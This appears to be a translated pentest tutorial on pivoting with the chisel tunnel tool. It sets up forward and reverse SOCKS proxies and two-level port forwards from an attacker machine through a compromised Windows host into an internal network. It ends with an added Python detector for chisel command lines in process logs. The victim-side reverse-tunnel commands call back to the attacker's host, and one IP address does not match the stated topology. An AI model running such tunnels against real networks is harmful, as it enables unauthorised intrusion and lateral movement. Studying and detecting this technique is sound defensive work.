chisel is a fast TCP/UDP tunnel transported over HTTP.
Project address: https://github.com/jpillora/chisel/releases
Advantages: Uses SSH encryption for better security. It has a disconnect and reconnect mechanism for better stability (similar to ew, which disconnects after a long period of inactivity). Written in Go, so it supports multiple platforms. Ships as a single file with no dependencies.
Attacker (kali): 192.168.6.131
Victim (windows): 192.168.6.129
Topology:
Attacker (192.168.6.131) <--> Victim (192.168.6.129, 10.1.1.1) <--> Internal Server (10.1.1.2)
Target Access: 10.1.1.2
Level 1 Proxy
Forward connection (socks)
Jump server (victim)
./chisel server -p 12345
Attacker
./chisel client 192.168.6.129:12345 socks
The SOCKS proxy is bound to port 1080 on the attacker machine, so you can use it by configuring a local socks5 proxy.
Reverse connection
Attacker (hacker)
./chisel server -p 12345 --reverse --socks5
Jump server (victim)
chisel.exe client 192.168.6.128:12345 R:socks
The attacker (hacker) can access 10.1.1.2.
Level 2 Proxy
Accessing specific ports
kali:
chisel server -p 3333 --reverse
web01:
Open two terminals and run both the server and the client:
chisel server -p 2222 --reverse
chisel client 192.168.126.132:3333 R:1111:127.0.0.1:5555
web02:
chisel client 192.168.150.128:2222 R:5555:192.168.59.129:80
Access 192.168.59.129:80 by visiting 127.0.0.1:1111 on kali.
Socks proxy
kali:
chisel server -p 3333 --reverse
web01:
Open two terminals and run both the server and the client:
chisel server -p 2222 --reverse --socks5
chisel client 192.168.126.132:3333 R:1111:socks
web02:
chisel client 192.168.150.128:2222 R:5555:socks
Configure the proxy chain in the proxychains.conf file:
socks5 127.0.0.1 1111
socks5 127.0.0.1 5555
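From the defender's side, the command lines above are what appears in process-creation logs. The following added example (not from the original page or the chisel project) parses the remote forms used on this page and reports which port each tunnel opens and what it reaches; the function names and the sample log lines are constructed for illustration.

```python
import re
import shlex

# Executable name as it appears in the commands on this page.
CHISEL_BIN = re.compile(r"(^|[\\/])chisel(\.exe)?$", re.IGNORECASE)

def parse_remote(spec):
    """Split a chisel remote such as 'R:1111:127.0.0.1:5555', 'R:1111:socks' or 'socks'."""
    reverse = spec.startswith("R:")          # R: means the listener opens on the server side
    parts = (spec[2:] if reverse else spec).split(":")
    socks = parts[-1] == "socks"
    if socks:
        listen = parts[-2] if len(parts) > 1 else "1080"   # chisel's default SOCKS port
        target = "socks"
    else:
        target = ":".join(parts[-2:])
        listen = parts[-3] if len(parts) > 2 else parts[-1]
    return {"reverse": reverse, "socks": socks, "listen_port": listen, "target": target}

def classify(cmdline):
    """Return a finding for a chisel server/client command line, else None."""
    argv = shlex.split(cmdline, posix=False)  # posix=False keeps Windows backslashes intact
    if len(argv) < 2 or not CHISEL_BIN.search(argv[0]) or argv[1] not in ("server", "client"):
        return None
    mode, args = argv[1], argv[2:]
    finding = {"mode": mode, "flags": [a for a in args if a.startswith("--")]}
    if mode == "server":
        if "-p" in args[:-1]:
            finding["port"] = args[args.index("-p") + 1]
    else:
        # Assumption: no value-taking client flags, as in the commands on this page.
        positional = [a for a in args if not a.startswith("-")]
        finding["server"] = positional[0] if positional else None
        finding["remotes"] = [parse_remote(r) for r in positional[1:]]
    return finding

# Constructed process-creation log lines, modelled on the commands above.
SAMPLE = [
    "./chisel server -p 12345 --reverse --socks5",
    "chisel.exe client 192.168.6.128:12345 R:socks",
    "chisel client 192.168.126.132:3333 R:1111:127.0.0.1:5555",
    "chisel client 192.168.150.128:2222 R:5555:socks",
    "ping 10.1.1.2",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(line, "->", classify(line))
```

The binary-name check is the weakest part of this match; the `client <host:port> R:...` argument shape and a `server` started with `--reverse` are the more durable signals to alert on.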
Reference: https://youtu.be/srUUUkcYEwg